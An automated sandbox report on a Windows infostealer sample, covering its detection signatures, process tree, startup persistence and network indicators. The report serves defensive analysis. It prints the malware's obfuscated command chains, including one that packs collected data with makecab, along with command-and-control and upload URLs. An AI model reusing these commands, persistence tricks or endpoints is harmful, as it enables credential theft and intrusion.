Loading ...

Play interactive tourEdit tour

Analysis Report WDnE51mua6.exe

Overview

General Information

Sample Name:WDnE51mua6.exe
Analysis ID:383838
MD5:7e7012645cc3d6d3572bb01891fbcec1
SHA1:712fe21354098f3764f6e9cbe7b57dc67a65c478
SHA256:df116f3585f1fe4b00c351a2941f6b85565e1fcc6da5569c6f7c80ddd1b4e2a8
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Submitted sample is a known malware sample
Contains functionality to register a low level keyboard hook
Creates processes via WMI
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for sample
Obfuscated command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses nslookup.exe to query domains
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • WDnE51mua6.exe (PID: 3000 cmdline: 'C:\Users\user\Desktop\WDnE51mua6.exe' MD5: 7E7012645CC3D6D3572BB01891FBCEC1)
    • svchost.exe (PID: 5744 cmdline: 'C:\Windows\System32\svchost.exe' MD5: FA6C268A5B5BDA067A901764D203D433)
    • cmd.exe (PID: 3908 cmdline: 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5720 cmdline: CmD MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • findstr.exe (PID: 4808 cmdline: findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
        • Gia.exe.com (PID: 2904 cmdline: Gia.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)
          • Gia.exe.com (PID: 5596 cmdline: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)
            • nslookup.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\nslookup.exe MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
        • PING.EXE (PID: 5044 cmdline: ping 127.0.0.1 -n 30 MD5: 70C24A306F768936563ABDADB9CA9108)
  • wscript.exe (PID: 5868 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • juROhmfLml.exe.com (PID: 6204 cmdline: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I MD5: 78BA0653A340BAC5FF152B21A83626CC)
    • nslookup.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\nslookup.exe MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • cmd.exe (PID: 5192 cmdline: cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6308 cmdline: cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 580 cmdline: wmic process get Name MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 3624 cmdline: cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 5036 cmdline: makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp' MD5: D0D74264402D9F402615F22258330EC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Drops script at startup locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49rAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.phpAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/kh=Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/8Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/hi0Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.phpmitAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/upload/upload.phpp/hi0Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/#huAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/5hcAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/ographyAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/Avira URL Cloud: Label: phishing
Source: https://banusdoret.top/sFtAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/DgAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/VgAvira URL Cloud: Label: phishing
Source: https://banusdoret.top/oi9Avira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted fileShow sources
Source: WDnE51mua6.exeVirustotal: Detection: 41%Perma Link
Source: WDnE51mua6.exeReversingLabs: Detection: 64%
Machine Learning detection for sampleShow sources
Source: WDnE51mua6.exeJoe Sandbox ML: detected
Source: WDnE51mua6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: unknownHTTPS traffic detected: 8.208.95.18:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00409931 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00404402 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403327 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403442 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_0091E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028E334 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002965AE FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0025C6C2 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00297205 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002972A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00299E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00299F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,

Networking:

barindex
Uses nslookup.exe to query domainsShow sources
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Uses ping.exe to check the status of other devices and networksShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: Joe Sandbox ViewIP Address: 8.208.95.18 8.208.95.18
Source: Joe Sandbox ViewIP Address: 8.208.95.18 8.208.95.18
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029D672 InternetReadFile,SetEvent,GetLastError,SetEvent,
Source: unknownDNS traffic detected: queries for: zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: nslookup.exe, 00000010.00000003.514415275.0000000003B97000.00000004.00000001.sdmpString found in binary or memory: http://cps.root
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: nslookup.exe, 00000010.00000003.514235035.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DST#
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
Source: nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Gia.exe.com, 00000006.00000000.354716969.0000000000985000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502867230.0000000000985000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529162484.00000000002F5000.00000002.00020000.sdmp, Gia.exe.com.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp, nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/#hu
Source: nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491
Source: nslookup.exe, 00000010.00000002.591717257.0000000003B30000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/5hc
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/8
Source: nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/Dg
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/Vg
Source: nslookup.exe, 00000010.00000003.536247326.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/hi0
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/kh=
Source: nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/ography
Source: nslookup.exe, 00000010.00000003.544012619.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/oi9
Source: nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/sFt
Source: nslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmpString found in binary or memory: https://banusdoret.top/upload/upload.php
Source: nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/upload/upload.phpmit
Source: nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.top/upload/upload.phpp/hi0
Source: nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmpString found in binary or memory: https://banusdoret.topctionSettings
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Gia.exe.com.5.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
